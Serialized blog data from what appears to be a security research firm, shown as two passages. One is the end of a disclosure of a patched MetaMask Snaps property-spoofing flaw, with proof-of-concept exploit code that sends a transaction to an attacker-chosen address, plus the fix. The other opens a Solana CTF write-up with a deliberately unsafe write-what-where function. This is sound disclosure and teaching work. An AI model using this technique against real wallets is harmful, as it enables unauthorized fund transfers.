\"snap_dialog\"\n",{"type":27,"tag":207,"props":46913,"children":46914},{"class":209,"line":1475},[46915],{"type":27,"tag":207,"props":46916,"children":46917},{"emptyLinePlaceholder":19},[46918],{"type":33,"value":2062},{"type":27,"tag":207,"props":46920,"children":46921},{"class":209,"line":2065},[46922,46926,46930,46934,46938,46942,46946],{"type":27,"tag":207,"props":46923,"children":46924},{"style":220},[46925],{"type":33,"value":46894},{"type":27,"tag":207,"props":46927,"children":46928},{"style":238},[46929],{"type":33,"value":1041},{"type":27,"tag":207,"props":46931,"children":46932},{"style":1335},[46933],{"type":33,"value":46658},{"type":27,"tag":207,"props":46935,"children":46936},{"style":226},[46937],{"type":33,"value":229},{"type":27,"tag":207,"props":46939,"children":46940},{"style":238},[46941],{"type":33,"value":2316},{"type":27,"tag":207,"props":46943,"children":46944},{"style":214},[46945],{"type":33,"value":2321},{"type":27,"tag":207,"props":46947,"children":46948},{"style":238},[46949],{"type":33,"value":384},{"type":27,"tag":207,"props":46951,"children":46952},{"class":209,"line":2092},[46953,46957],{"type":27,"tag":207,"props":46954,"children":46955},{"style":376},[46956],{"type":33,"value":8986},{"type":27,"tag":207,"props":46958,"children":46959},{"style":238},[46960],{"type":33,"value":384},{"type":27,"tag":207,"props":46962,"children":46963},{"class":209,"line":2130},[46964,46969,46974],{"type":27,"tag":207,"props":46965,"children":46966},{"style":220},[46967],{"type":33,"value":46968}," method:",{"type":27,"tag":207,"props":46970,"children":46971},{"style":1325},[46972],{"type":33,"value":46973}," \"eth_requestAccounts\"",{"type":27,"tag":207,"props":46975,"children":46976},{"style":238},[46977],{"type":33,"value":1842},{"type":27,"tag":207,"props":46979,"children":46980},{"class":209,"line":2168},[46981,46986],{"type":27,"tag":207,"props":46982,"children":46983},{"style":220},[46984],{"type":33,"value":46985}," params:",{"type":27,"tag":207,"props":46987,"children":46988},{"style":238},[46989],{"type":33,"value":46990}," []\n",{"type":27,"tag":207,"props":46992,"children":46993},{"class":209,"line":4095},[46994],{"type":27,"tag":207,"props":46995,"children":46996},{"style":238},[46997],{"type":33,"value":10645},{"type":27,"tag":207,"props":46999,"children":47000},{"class":209,"line":4103},[47001],{"type":27,"tag":207,"props":47002,"children":47003},{"style":238},[47004],{"type":33,"value":5312},{"type":27,"tag":207,"props":47006,"children":47007},{"class":209,"line":4154},[47008],{"type":27,"tag":207,"props":47009,"children":47010},{"emptyLinePlaceholder":19},[47011],{"type":33,"value":2062},{"type":27,"tag":207,"props":47013,"children":47014},{"class":209,"line":4203},[47015,47019,47024,47028,47032,47036,47040],{"type":27,"tag":207,"props":47016,"children":47017},{"style":376},[47018],{"type":33,"value":46444},{"type":27,"tag":207,"props":47020,"children":47021},{"style":220},[47022],{"type":33,"value":47023}," snap",{"type":27,"tag":207,"props":47025,"children":47026},{"style":238},[47027],{"type":33,"value":1041},{"type":27,"tag":207,"props":47029,"children":47030},{"style":1335},[47031],{"type":33,"value":38753},{"type":27,"tag":207,"props":47033,"children":47034},{"style":238},[47035],{"type":33,"value":1343},{"type":27,"tag":207,"props":47037,"children":47038},{"style":220},[47039],{"type":33,"value":26546},{"type":27,"tag":207,"props":47041,"children":47042},{"style":238},[47043],{"type":33,"value":10449},{"type":27,"tag":207,"props":47045,"children":47046},{"class":209,"line":4249},[47047],{"type":27,"tag":207,"props":47048,"children":47049},{"emptyLinePlaceholder":19},[47050],{"type":33,"value":2062},{"type":27,"tag":207,"props":47052,"children":47053},{"class":209,"line":4290},[47054],{"type":27,"tag":207,"props":47055,"children":47056},{"style":238},[47057],{"type":33,"value":451},{"type":27,"tag":207,"props":47059,"children":47060},{"class":209,"line":4304},[47061],{"type":27,"tag":207,"props":47062,"children":47063},{"emptyLinePlaceholder":19},[47064],{"type":33,"value":2062},{"type":27,"tag":207,"props":47066,"children":47067},{"class":209,"line":5466},[47068,47072,47077],{"type":27,"tag":207,"props":47069,"children":47070},{"style":214},[47071],{"type":33,"value":38637},{"type":27,"tag":207,"props":47073,"children":47074},{"style":1335},[47075],{"type":33,"value":47076}," transactionExploit",{"type":27,"tag":207,"props":47078,"children":47079},{"style":238},[47080],{"type":33,"value":46850},{"type":27,"tag":207,"props":47082,"children":47083},{"class":209,"line":5530},[47084,47088,47092,47096,47100,47104],{"type":27,"tag":207,"props":47085,"children":47086},{"style":214},[47087],{"type":33,"value":425},{"type":27,"tag":207,"props":47089,"children":47090},{"style":220},[47091],{"type":33,"value":26335},{"type":27,"tag":207,"props":47093,"children":47094},{"style":226},[47095],{"type":33,"value":229},{"type":27,"tag":207,"props":47097,"children":47098},{"style":238},[47099],{"type":33,"value":46870},{"type":27,"tag":207,"props":47101,"children":47102},{"style":376},[47103],{"type":33,"value":16122},{"type":27,"tag":207,"props":47105,"children":47106},{"style":8920},[47107],{"type":33,"value":46879},{"type":27,"tag":207,"props":47109,"children":47110},{"class":209,"line":7900},[47111],{"type":27,"tag":207,"props":47112,"children":47113},{"emptyLinePlaceholder":19},[47114],{"type":33,"value":2062},{"type":27,"tag":207,"props":47116,"children":47117},{"class":209,"line":7909},[47118,47122,47126,47130,47134],{"type":27,"tag":207,"props":47119,"children":47120},{"style":220},[47121],{"type":33,"value":46894},{"type":27,"tag":207,"props":47123,"children":47124},{"style":238},[47125],{"type":33,"value":1041},{"type":27,"tag":207,"props":47127,"children":47128},{"style":220},[47129],{"type":33,"value":45559},{"type":27,"tag":207,"props":47131,"children":47132},{"style":226},[47133],{"type":33,"value":229},{"type":27,"tag":207,"props":47135,"children":47136},{"style":1325},[47137],{"type":33,"value":46911},{"type":27,"tag":207,"props":47139,"children":47140},{"class":209,"line":7917},[47141],{"type":27,"tag":207,"props":47142,"children":47143},{"emptyLinePlaceholder":19},[47144],{"type":33,"value":2062},{"type":27,"tag":207,"props":47146,"children":47147},{"class":209,"line":7926},[47148,47152,47156,47160,47164,47168,47172],{"type":27,"tag":207,"props":47149,"children":47150},{"style":220},[47151],{"type":33,"value":46894},{"type":27,"tag":207,"props":47153,"children":47154},{"style":238},[47155],{"type":33,"value":1041},{"type":27,"tag":207,"props":47157,"children":47158},{"style":1335},[47159],{"type":33,"value":46658},{"type":27,"tag":207,"props":47161,"children":47162},{"style":226},[47163],{"type":33,"value":229},{"type":27,"tag":207,"props":47165,"children":47166},{"style":238},[47167],{"type":33,"value":2316},{"type":27,"tag":207,"props":47169,"children":47170},{"style":214},[47171],{"type":33,"value":2321},{"type":27,"tag":207,"props":47173,"children":47174},{"style":238},[47175],{"type":33,"value":384},{"type":27,"tag":207,"props":47177,"children":47178},{"class":209,"line":7934},[47179,47183],{"type":27,"tag":207,"props":47180,"children":47181},{"style":376},[47182],{"type":33,"value":8986},{"type":27,"tag":207,"props":47184,"children":47185},{"style":238},[47186],{"type":33,"value":384},{"type":27,"tag":207,"props":47188,"children":47189},{"class":209,"line":7943},[47190,47194,47199],{"type":27,"tag":207,"props":47191,"children":47192},{"style":220},[47193],{"type":33,"value":46968},{"type":27,"tag":207,"props":47195,"children":47196},{"style":1325},[47197],{"type":33,"value":47198}," \"eth_sendTransaction\"",{"type":27,"tag":207,"props":47200,"children":47201},{"style":238},[47202],{"type":33,"value":1842},{"type":27,"tag":207,"props":47204,"children":47205},{"class":209,"line":7952},[47206,47210],{"type":27,"tag":207,"props":47207,"children":47208},{"style":220},[47209],{"type":33,"value":46985},{"type":27,"tag":207,"props":47211,"children":47212},{"style":238},[47213],{"type":33,"value":47214}," [{\n",{"type":27,"tag":207,"props":47216,"children":47217},{"class":209,"line":7961},[47218,47222,47227,47231],{"type":27,"tag":207,"props":47219,"children":47220},{"style":220},[47221],{"type":33,"value":39324},{"type":27,"tag":207,"props":47223,"children":47224},{"style":1325},[47225],{"type":33,"value":47226}," \"0xcf26B767586cC5fCF8737dD3FA57de164aF4248d\"",{"type":27,"tag":207,"props":47228,"children":47229},{"style":238},[47230],{"type":33,"value":1123},{"type":27,"tag":207,"props":47232,"children":47233},{"style":4647},[47234],{"type":33,"value":47235},"// change this to your address\n",{"type":27,"tag":207,"props":47237,"children":47238},{"class":209,"line":7969},[47239,47243,47247],{"type":27,"tag":207,"props":47240,"children":47241},{"style":220},[47242],{"type":33,"value":39340},{"type":27,"tag":207,"props":47244,"children":47245},{"style":1325},[47246],{"type":33,"value":47226},{"type":27,"tag":207,"props":47248,"children":47249},{"style":238},[47250],{"type":33,"value":1842},{"type":27,"tag":207,"props":47252,"children":47253},{"class":209,"line":7978},[47254,47259,47264],{"type":27,"tag":207,"props":47255,"children":47256},{"style":220},[47257],{"type":33,"value":47258}," value:",{"type":27,"tag":207,"props":47260,"children":47261},{"style":1325},[47262],{"type":33,"value":47263}," \"0x1\"",{"type":27,"tag":207,"props":47265,"children":47266},{"style":238},[47267],{"type":33,"value":1842},{"type":27,"tag":207,"props":47269,"children":47270},{"class":209,"line":7987},[47271],{"type":27,"tag":207,"props":47272,"children":47273},{"style":238},[47274],{"type":33,"value":47275}," }]\n",{"type":27,"tag":207,"props":47277,"children":47278},{"class":209,"line":7996},[47279],{"type":27,"tag":207,"props":47280,"children":47281},{"style":238},[47282],{"type":33,"value":10645},{"type":27,"tag":207,"props":47284,"children":47285},{"class":209,"line":8005},[47286],{"type":27,"tag":207,"props":47287,"children":47288},{"style":238},[47289],{"type":33,"value":5312},{"type":27,"tag":207,"props":47291,"children":47292},{"class":209,"line":8013},[47293],{"type":27,"tag":207,"props":47294,"children":47295},{"emptyLinePlaceholder":19},[47296],{"type":33,"value":2062},{"type":27,"tag":207,"props":47298,"children":47299},{"class":209,"line":8021},[47300,47304,47308,47312,47316,47320,47324],{"type":27,"tag":207,"props":47301,"children":47302},{"style":376},[47303],{"type":33,"value":46444},{"type":27,"tag":207,"props":47305,"children":47306},{"style":220},[47307],{"type":33,"value":47023},{"type":27,"tag":207,"props":47309,"children":47310},{"style":238},[47311],{"type":33,"value":1041},{"type":27,"tag":207,"props":47313,"children":47314},{"style":1335},[47315],{"type":33,"value":38753},{"type":27,"tag":207,"props":47317,"children":47318},{"style":238},[47319],{"type":33,"value":1343},{"type":27,"tag":207,"props":47321,"children":47322},{"style":220},[47323],{"type":33,"value":26546},{"type":27,"tag":207,"props":47325,"children":47326},{"style":238},[47327],{"type":33,"value":1455},{"type":27,"tag":207,"props":47329,"children":47330},{"class":209,"line":8029},[47331],{"type":27,"tag":207,"props":47332,"children":47333},{"style":238},[47334],{"type":33,"value":451},{"type":27,"tag":207,"props":47336,"children":47337},{"class":209,"line":8037},[47338],{"type":27,"tag":207,"props":47339,"children":47340},{"emptyLinePlaceholder":19},[47341],{"type":33,"value":2062},{"type":27,"tag":207,"props":47343,"children":47344},{"class":209,"line":8046},[47345,47349,47353,47358,47362,47367,47371,47376,47381,47385,47389,47394,47398],{"type":27,"tag":207,"props":47346,"children":47347},{"style":376},[47348],{"type":33,"value":45456},{"type":27,"tag":207,"props":47350,"children":47351},{"style":214},[47352],{"type":33,"value":46357},{"type":27,"tag":207,"props":47354,"children":47355},{"style":1335},[47356],{"type":33,"value":47357}," onRpcRequest",{"type":27,"tag":207,"props":47359,"children":47360},{"style":226},[47361],{"type":33,"value":736},{"type":27,"tag":207,"props":47363,"children":47364},{"style":8920},[47365],{"type":33,"value":47366}," OnRpcRequestHandler",{"type":27,"tag":207,"props":47368,"children":47369},{"style":226},[47370],{"type":33,"value":229},{"type":27,"tag":207,"props":47372,"children":47373},{"style":238},[47374],{"type":33,"value":47375}," ({ ",{"type":27,"tag":207,"props":47377,"children":47378},{"style":220},[47379],{"type":33,"value":47380},"origin",{"type":27,"tag":207,"props":47382,"children":47383},{"style":238},[47384],{"type":33,"value":1123},{"type":27,"tag":207,"props":47386,"children":47387},{"style":220},[47388],{"type":33,"value":38753},{"type":27,"tag":207,"props":47390,"children":47391},{"style":238},[47392],{"type":33,"value":47393}," }) ",{"type":27,"tag":207,"props":47395,"children":47396},{"style":214},[47397],{"type":33,"value":2321},{"type":27,"tag":207,"props":47399,"children":47400},{"style":238},[47401],{"type":33,"value":384},{"type":27,"tag":207,"props":47403,"children":47404},{"class":209,"line":8055},[47405],{"type":27,"tag":207,"props":47406,"children":47407},{"emptyLinePlaceholder":19},[47408],{"type":33,"value":2062},{"type":27,"tag":207,"props":47410,"children":47411},{"class":209,"line":8064},[47412,47417,47421,47425,47429,47433],{"type":27,"tag":207,"props":47413,"children":47414},{"style":376},[47415],{"type":33,"value":47416}," switch",{"type":27,"tag":207,"props":47418,"children":47419},{"style":238},[47420],{"type":33,"value":686},{"type":27,"tag":207,"props":47422,"children":47423},{"style":220},[47424],{"type":33,"value":38753},{"type":27,"tag":207,"props":47426,"children":47427},{"style":238},[47428],{"type":33,"value":1041},{"type":27,"tag":207,"props":47430,"children":47431},{"style":220},[47432],{"type":33,"value":45559},{"type":27,"tag":207,"props":47434,"children":47435},{"style":238},[47436],{"type":33,"value":1424},{"type":27,"tag":207,"props":47438,"children":47439},{"class":209,"line":8072},[47440,47445,47450],{"type":27,"tag":207,"props":47441,"children":47442},{"style":376},[47443],{"type":33,"value":47444}," case",{"type":27,"tag":207,"props":47446,"children":47447},{"style":1325},[47448],{"type":33,"value":47449}," 'json'",{"type":27,"tag":207,"props":47451,"children":47452},{"style":238},[47453],{"type":33,"value":12851},{"type":27,"tag":207,"props":47455,"children":47456},{"class":209,"line":8081},[47457,47461,47465],{"type":27,"tag":207,"props":47458,"children":47459},{"style":376},[47460],{"type":33,"value":46602},{"type":27,"tag":207,"props":47462,"children":47463},{"style":1335},[47464],{"type":33,"value":46845},{"type":27,"tag":207,"props":47466,"children":47467},{"style":238},[47468],{"type":33,"value":4301},{"type":27,"tag":207,"props":47470,"children":47471},{"class":209,"line":8090},[47472,47476,47481],{"type":27,"tag":207,"props":47473,"children":47474},{"style":376},[47475],{"type":33,"value":47444},{"type":27,"tag":207,"props":47477,"children":47478},{"style":1325},[47479],{"type":33,"value":47480}," 'transaction'",{"type":27,"tag":207,"props":47482,"children":47483},{"style":238},[47484],{"type":33,"value":12851},{"type":27,"tag":207,"props":47486,"children":47487},{"class":209,"line":8098},[47488,47492,47496],{"type":27,"tag":207,"props":47489,"children":47490},{"style":376},[47491],{"type":33,"value":46602},{"type":27,"tag":207,"props":47493,"children":47494},{"style":1335},[47495],{"type":33,"value":47076},{"type":27,"tag":207,"props":47497,"children":47498},{"style":238},[47499],{"type":33,"value":4301},{"type":27,"tag":207,"props":47501,"children":47502},{"class":209,"line":8107},[47503,47508],{"type":27,"tag":207,"props":47504,"children":47505},{"style":376},[47506],{"type":33,"value":47507}," default",{"type":27,"tag":207,"props":47509,"children":47510},{"style":238},[47511],{"type":33,"value":12851},{"type":27,"tag":207,"props":47513,"children":47514},{"class":209,"line":8116},[47515,47520,47524,47529,47533,47538],{"type":27,"tag":207,"props":47516,"children":47517},{"style":376},[47518],{"type":33,"value":47519}," throw",{"type":27,"tag":207,"props":47521,"children":47522},{"style":214},[47523],{"type":33,"value":1597},{"type":27,"tag":207,"props":47525,"children":47526},{"style":1335},[47527],{"type":33,"value":47528}," Error",{"type":27,"tag":207,"props":47530,"children":47531},{"style":238},[47532],{"type":33,"value":1343},{"type":27,"tag":207,"props":47534,"children":47535},{"style":1325},[47536],{"type":33,"value":47537},"'Method not found.'",{"type":27,"tag":207,"props":47539,"children":47540},{"style":238},[47541],{"type":33,"value":1455},{"type":27,"tag":207,"props":47543,"children":47544},{"class":209,"line":8125},[47545],{"type":27,"tag":207,"props":47546,"children":47547},{"style":238},[47548],{"type":33,"value":5312},{"type":27,"tag":207,"props":47550,"children":47551},{"class":209,"line":8133},[47552],{"type":27,"tag":207,"props":47553,"children":47554},{"style":238},[47555],{"type":33,"value":23852},{"type":27,"tag":36,"props":47557,"children":47558},{},[47559,47561,47567,47569,47574],{"type":33,"value":47560},"We set ",{"type":27,"tag":84,"props":47562,"children":47564},{"className":47563},[],[47565],{"type":33,"value":47566},"x.method = \"snap_dialog\"",{"type":33,"value":47568}," to pass the assertion and setup a toJSON function to change this method to ",{"type":27,"tag":84,"props":47570,"children":47572},{"className":47571},[],[47573],{"type":33,"value":46777},{"type":33,"value":47575}," after.",{"type":27,"tag":58,"props":47577,"children":47579},{"id":47578},"mitigation",[47580],{"type":33,"value":47581},"Mitigation",{"type":27,"tag":36,"props":47583,"children":47584},{},[47585,47587,47592,47594,47601],{"type":33,"value":47586},"Metamask mitigated this issue by asserting the arguments after the ",{"type":27,"tag":84,"props":47588,"children":47590},{"className":47589},[],[47591],{"type":33,"value":46322},{"type":33,"value":47593}," function execution. The patch was introduced on commit ",{"type":27,"tag":47,"props":47595,"children":47598},{"href":47596,"rel":47597},"https://github.com/MetaMask/snaps/pull/1762/commits/168ff082102a65e2aad428f44c5b10f9a100c689",[51],[47599],{"type":33,"value":47600},"168ff08",{"type":33,"value":47602}," with the following changes:",{"type":27,"tag":101,"props":47604,"children":47608},{"className":47605,"code":47606,"language":47607,"meta":7,"style":7},"language-diff shiki shiki-themes slack-dark","const request = async (args: RequestArguments) => {\n- assertEthereumOutboundRequest(args);\n- const sanitizedArgs = getSafeJson(args);\n+ const sanitizedArgs = getSafeJson(args) as RequestArguments;\n+ assertEthereumOutboundRequest(sanitizedArgs);\n","diff",[47609],{"type":27,"tag":84,"props":47610,"children":47611},{"__ignoreMap":7},[47612,47620,47628,47636,47644],{"type":27,"tag":207,"props":47613,"children":47614},{"class":209,"line":210},[47615],{"type":27,"tag":207,"props":47616,"children":47617},{"style":238},[47618],{"type":33,"value":47619},"const request = async (args: RequestArguments) => {\n",{"type":27,"tag":207,"props":47621,"children":47622},{"class":209,"line":244},[47623],{"type":27,"tag":207,"props":47624,"children":47625},{"style":1325},[47626],{"type":33,"value":47627},"- assertEthereumOutboundRequest(args);\n",{"type":27,"tag":207,"props":47629,"children":47630},{"class":209,"line":270},[47631],{"type":27,"tag":207,"props":47632,"children":47633},{"style":1325},[47634],{"type":33,"value":47635},"- const sanitizedArgs = getSafeJson(args);\n",{"type":27,"tag":207,"props":47637,"children":47638},{"class":209,"line":296},[47639],{"type":27,"tag":207,"props":47640,"children":47641},{"style":232},[47642],{"type":33,"value":47643},"+ const sanitizedArgs = getSafeJson(args) as RequestArguments;\n",{"type":27,"tag":207,"props":47645,"children":47646},{"class":209,"line":445},[47647],{"type":27,"tag":207,"props":47648,"children":47649},{"style":232},[47650],{"type":33,"value":47651},"+ assertEthereumOutboundRequest(sanitizedArgs);\n",{"type":27,"tag":28,"props":47653,"children":47654},{"id":10112},[47655],{"type":33,"value":10115},{"type":27,"tag":36,"props":47657,"children":47658},{},[47659],{"type":33,"value":47660},"This unique property spoofing vulnerability in the Snaps sandboxing implementation illustrates the wide range of control attackers have in Javascript, which makes designing robust sandbox implementations an extremely complex task.",{"type":27,"tag":36,"props":47662,"children":47663},{},[47664],{"type":33,"value":47665},"Metamask has implemented numerous layers to mitigate potential exploits, and we're proud to help contribute to making Snaps more secure.",{"type":27,"tag":10127,"props":47667,"children":47668},{},[47669],{"type":33,"value":10131},{"title":7,"searchDepth":244,"depth":244,"links":47671},[47672,47673,47680,47688],{"id":26226,"depth":244,"text":26229},{"id":42706,"depth":244,"text":42709,"children":47674},[47675,47676,47677,47678,47679],{"id":42717,"depth":270,"text":42720},{"id":42785,"depth":270,"text":42788},{"id":42821,"depth":270,"text":42824},{"id":44213,"depth":270,"text":44216},{"id":44571,"depth":270,"text":44574},{"id":45355,"depth":244,"text":45358,"children":47681},[47682,47683,47684,47685,47686,47687],{"id":45361,"depth":270,"text":45364},{"id":45405,"depth":270,"text":45408},{"id":46308,"depth":270,"text":46311},{"id":12945,"depth":270,"text":12948},{"id":46750,"depth":270,"text":42085},{"id":47578,"depth":270,"text":47581},{"id":10112,"depth":244,"text":10115},"content:blog:2023-11-01-metamask-snaps.md","blog/2023-11-01-metamask-snaps.md","blog/2023-11-01-metamask-snaps",{"_path":47693,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":47694,"description":47695,"author":47696,"image":47698,"date":47700,"isFeatured":19,"onBlogPage":19,"body":47701,"_type":10152,"_id":53113,"_source":10154,"_file":53114,"_stem":53115,"_extension":10157},"/blog/2023-12-11-jumping-around-in-the-vm","Solana: Jumping Around in the VM","An exploration of low-level Solana VM behavior. How to escalate from a powerful memory corruption primitive to full program control.",[47697,13003],"nicola",{"src":47699},"/posts/jumping-around-in-the-vm/cover.png","2023-12-11",{"type":24,"children":47702,"toc":53102},[47703,47717,47737,47742,47746,47759,47784,47790,47795,47810,48163,48178,48443,48459,49102,49108,49113,49126,49134,49346,49354,49657,49665,49808,49816,50341,50347,50359,50372,50386,50391,51159,51164,51172,51177,51183,51195,51260,51265,51278,51291,51297,51325,52469,52482,52524,52529,52534,52548,52688,52709,52730,52737,52788,52796,52807,52820,52825,52949,52962,53064,53068,53081,53086,53098],{"type":27,"tag":36,"props":47704,"children":47705},{},[47706,47708,47715],{"type":33,"value":47707},"In the world of CTFs, ",{"type":27,"tag":47,"props":47709,"children":47712},{"href":47710,"rel":47711},"https://twitter.com/paradigm_ctf",[51],[47713],{"type":33,"value":47714},"Paradigm CTF 2023",{"type":33,"value":47716}," was like no other. Presenting a unique Solana challenge, the goal was to leverage Jump Oriented Programming, a web2 binary exploitation technique, inside the Solana VM to achieve arbitrary CPI execution.",{"type":27,"tag":36,"props":47718,"children":47719},{},[47720,47722,47729,47730],{"type":33,"value":47721},"To succeed in this challenge, a strong understanding of the Solana VM is required. We've explored parts of the Solana VM internals in two previous blog posts: ",{"type":27,"tag":47,"props":47723,"children":47726},{"href":47724,"rel":47725},"https://osec.io/blog/2022-03-14-solana-security-intro",[51],[47727],{"type":33,"value":47728},"Solana: An Auditor's Introduction",{"type":33,"value":1131},{"type":27,"tag":47,"props":47731,"children":47734},{"href":47732,"rel":47733},"https://osec.io/blog/2022-08-27-reverse-engineering-solana",[51],[47735],{"type":33,"value":47736},"Reverse Engineering Solana with Binary Ninja.\n",{"type":27,"tag":36,"props":47738,"children":47739},{},[47740],{"type":33,"value":47741},"In this comprehensive overview, we'll break down critical components of the Solana BPF VM necessary to write a complete memory-corruption exploit. We then turn an arbitrary function call and memory write primitive into a full exploit.",{"type":27,"tag":28,"props":47743,"children":47744},{"id":26226},[47745],{"type":33,"value":26229},{"type":27,"tag":36,"props":47747,"children":47748},{},[47749,47751,47757],{"type":33,"value":47750},"The challenge itself resides into ",{"type":27,"tag":84,"props":47752,"children":47754},{"className":47753},[],[47755],{"type":33,"value":47756},"framework/",{"type":33,"value":47758},", and is composed of 2 parts:",{"type":27,"tag":1228,"props":47760,"children":47761},{},[47762,47773],{"type":27,"tag":1232,"props":47763,"children":47764},{},[47765,47771],{"type":27,"tag":84,"props":47766,"children":47768},{"className":47767},[],[47769],{"type":33,"value":47770},"framework/chall/lib.rs",{"type":33,"value":47772},": The on-chain eBPF program that needs to be exploited.",{"type":27,"tag":1232,"props":47774,"children":47775},{},[47776,47782],{"type":27,"tag":84,"props":47777,"children":47779},{"className":47778},[],[47780],{"type":33,"value":47781},"framework/src/main.rs",{"type":33,"value":47783},": Program that setups a solana test environment, gets a single instruction and make it possible to users to interact with the on-chain program.",{"type":27,"tag":58,"props":47785,"children":47787},{"id":47786},"vulnerable-program",[47788],{"type":33,"value":47789},"Vulnerable Program",{"type":27,"tag":36,"props":47791,"children":47792},{},[47793],{"type":33,"value":47794},"The program is simple: it parses the input data and does something based on the first byte. Each potential action is quite out of the ordinary though!",{"type":27,"tag":12719,"props":47796,"children":47797},{},[47798],{"type":27,"tag":1232,"props":47799,"children":47800},{},[47801,47802,47808],{"type":33,"value":14762},{"type":27,"tag":84,"props":47803,"children":47805},{"className":47804},[],[47806],{"type":33,"value":47807},"data[0] == 0",{"type":33,"value":47809}," a function that lets you write-what-where is executed",{"type":27,"tag":101,"props":47811,"children":47813},{"className":10270,"code":47812,"language":10269,"meta":7,"style":7},"#[inline(never)]\npub fn write(data: &[u8]) {\n unsafe {\n let ptr = std::mem::transmute::\u003C[u8; 8], *mut u64>(data[..8].try_into().unwrap());\n let val = std::mem::transmute::\u003C[u8; 8], u64>(data[8..16].try_into().unwrap());\n ptr.write_volatile(val);\n }\n}\n",[47814],{"type":27,"tag":84,"props":47815,"children":47816},{"__ignoreMap":7},[47817,47825,47870,47881,48004,48120,48149,48156],{"type":27,"tag":207,"props":47818,"children":47819},{"class":209,"line":210},[47820],{"type":27,"tag":207,"props":47821,"children":47822},{"style":238},[47823],{"type":33,"value":47824},"#[inline(never)]\n",{"type":27,"tag":207,"props":47826,"children":47827},{"class":209,"line":244},[47828,47832,47836,47841,47845,47849,47853,47857,47861,47865],{"type":27,"tag":207,"props":47829,"children":47830},{"style":214},[47831],{"type":33,"value":20967},{"type":27,"tag":207,"props":47833,"children":47834},{"style":214},[47835],{"type":33,"value":20972},{"type":27,"tag":207,"props":47837,"children":47838},{"style":1335},[47839],{"type":33,"value":47840}," write",{"type":27,"tag":207,"props":47842,"children":47843},{"style":238},[47844],{"type":33,"value":1343},{"type":27,"tag":207,"props":47846,"children":47847},{"style":220},[47848],{"type":33,"value":9468},{"type":27,"tag":207,"props":47850,"children":47851},{"style":226},[47852],{"type":33,"value":736},{"type":27,"tag":207,"props":47854,"children":47855},{"style":226},[47856],{"type":33,"value":14423},{"type":27,"tag":207,"props":47858,"children":47859},{"style":238},[47860],{"type":33,"value":11019},{"type":27,"tag":207,"props":47862,"children":47863},{"style":8920},[47864],{"type":33,"value":10709},{"type":27,"tag":207,"props":47866,"children":47867},{"style":238},[47868],{"type":33,"value":47869},"]) {\n",{"type":27,"tag":207,"props":47871,"children":47872},{"class":209,"line":270},[47873,47877],{"type":27,"tag":207,"props":47874,"children":47875},{"style":214},[47876],{"type":33,"value":21109},{"type":27,"tag":207,"props":47878,"children":47879},{"style":238},[47880],{"type":33,"value":384},{"type":27,"tag":207,"props":47882,"children":47883},{"class":209,"line":296},[47884,47888,47892,47896,47901,47905,47910,47914,47919,47923,47928,47932,47936,47940,47944,47948,47952,47956,47960,47964,47968,47972,47976,47980,47984,47988,47992,47996,48000],{"type":27,"tag":207,"props":47885,"children":47886},{"style":214},[47887],{"type":33,"value":10353},{"type":27,"tag":207,"props":47889,"children":47890},{"style":220},[47891],{"type":33,"value":21133},{"type":27,"tag":207,"props":47893,"children":47894},{"style":226},[47895],{"type":33,"value":229},{"type":27,"tag":207,"props":47897,"children":47898},{"style":238},[47899],{"type":33,"value":47900}," std",{"type":27,"tag":207,"props":47902,"children":47903},{"style":226},[47904],{"type":33,"value":10768},{"type":27,"tag":207,"props":47906,"children":47907},{"style":238},[47908],{"type":33,"value":47909},"mem",{"type":27,"tag":207,"props":47911,"children":47912},{"style":226},[47913],{"type":33,"value":10768},{"type":27,"tag":207,"props":47915,"children":47916},{"style":1335},[47917],{"type":33,"value":47918},"transmute",{"type":27,"tag":207,"props":47920,"children":47921},{"style":226},[47922],{"type":33,"value":10768},{"type":27,"tag":207,"props":47924,"children":47925},{"style":238},[47926],{"type":33,"value":47927},"\u003C[",{"type":27,"tag":207,"props":47929,"children":47930},{"style":8920},[47931],{"type":33,"value":10709},{"type":27,"tag":207,"props":47933,"children":47934},{"style":238},[47935],{"type":33,"value":4685},{"type":27,"tag":207,"props":47937,"children":47938},{"style":232},[47939],{"type":33,"value":3578},{"type":27,"tag":207,"props":47941,"children":47942},{"style":238},[47943],{"type":33,"value":30333},{"type":27,"tag":207,"props":47945,"children":47946},{"style":226},[47947],{"type":33,"value":9286},{"type":27,"tag":207,"props":47949,"children":47950},{"style":214},[47951],{"type":33,"value":11009},{"type":27,"tag":207,"props":47953,"children":47954},{"style":8920},[47955],{"type":33,"value":13142},{"type":27,"tag":207,"props":47957,"children":47958},{"style":238},[47959],{"type":33,"value":14893},{"type":27,"tag":207,"props":47961,"children":47962},{"style":220},[47963],{"type":33,"value":9468},{"type":27,"tag":207,"props":47965,"children":47966},{"style":238},[47967],{"type":33,"value":11019},{"type":27,"tag":207,"props":47969,"children":47970},{"style":226},[47971],{"type":33,"value":10340},{"type":27,"tag":207,"props":47973,"children":47974},{"style":232},[47975],{"type":33,"value":3578},{"type":27,"tag":207,"props":47977,"children":47978},{"style":238},[47979],{"type":33,"value":22686},{"type":27,"tag":207,"props":47981,"children":47982},{"style":226},[47983],{"type":33,"value":1041},{"type":27,"tag":207,"props":47985,"children":47986},{"style":1335},[47987],{"type":33,"value":33427},{"type":27,"tag":207,"props":47989,"children":47990},{"style":238},[47991],{"type":33,"value":21155},{"type":27,"tag":207,"props":47993,"children":47994},{"style":226},[47995],{"type":33,"value":1041},{"type":27,"tag":207,"props":47997,"children":47998},{"style":1335},[47999],{"type":33,"value":10952},{"type":27,"tag":207,"props":48001,"children":48002},{"style":238},[48003],{"type":33,"value":22700},{"type":27,"tag":207,"props":48005,"children":48006},{"class":209,"line":445},[48007,48011,48016,48020,48024,48028,48032,48036,48040,48044,48048,48052,48056,48060,48064,48068,48072,48076,48080,48084,48088,48092,48096,48100,48104,48108,48112,48116],{"type":27,"tag":207,"props":48008,"children":48009},{"style":214},[48010],{"type":33,"value":10353},{"type":27,"tag":207,"props":48012,"children":48013},{"style":220},[48014],{"type":33,"value":48015}," 